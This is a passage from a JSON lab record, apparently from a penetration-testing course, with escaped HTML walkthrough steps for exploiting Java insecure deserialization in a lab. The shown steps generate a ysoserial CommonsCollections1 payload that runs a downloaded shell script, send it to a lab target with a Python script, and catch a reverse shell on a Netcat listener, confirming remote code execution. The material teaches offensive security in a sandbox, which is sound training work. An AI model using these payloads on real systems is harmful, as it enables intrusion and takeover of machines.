src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/10.png\" /></p>\n<p><strong>Step 12:</strong> Generate a payload for executing the downloaded shell.sh file again.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"/bin/bash /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"11\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/11.png\" /></p>\n<p><strong>Step 13:</strong> Execute the python code again to send the payload to the target machine for executing shell.sh file.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"12\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/12.png\" /></p>\n<p><strong>Step 14:</strong> Open the terminal where the Netcat was listening. The shell should arrive on the Netcat listener.</p>\n<p>Check the id by the following command.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>id</code></pre></p>\n<p><img alt=\"13\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/13.png\" /></p>\n<p>Successfully achieved remote code execution.</p>",
    "flags": [],
    "min_points_to_pass": null,
    "access_type": "default",
    "user_status": "unstarted",
    "user_lab_status": null,
    "user_status_modified": null,
    "user_flags": [],
    "global_running_session": null
}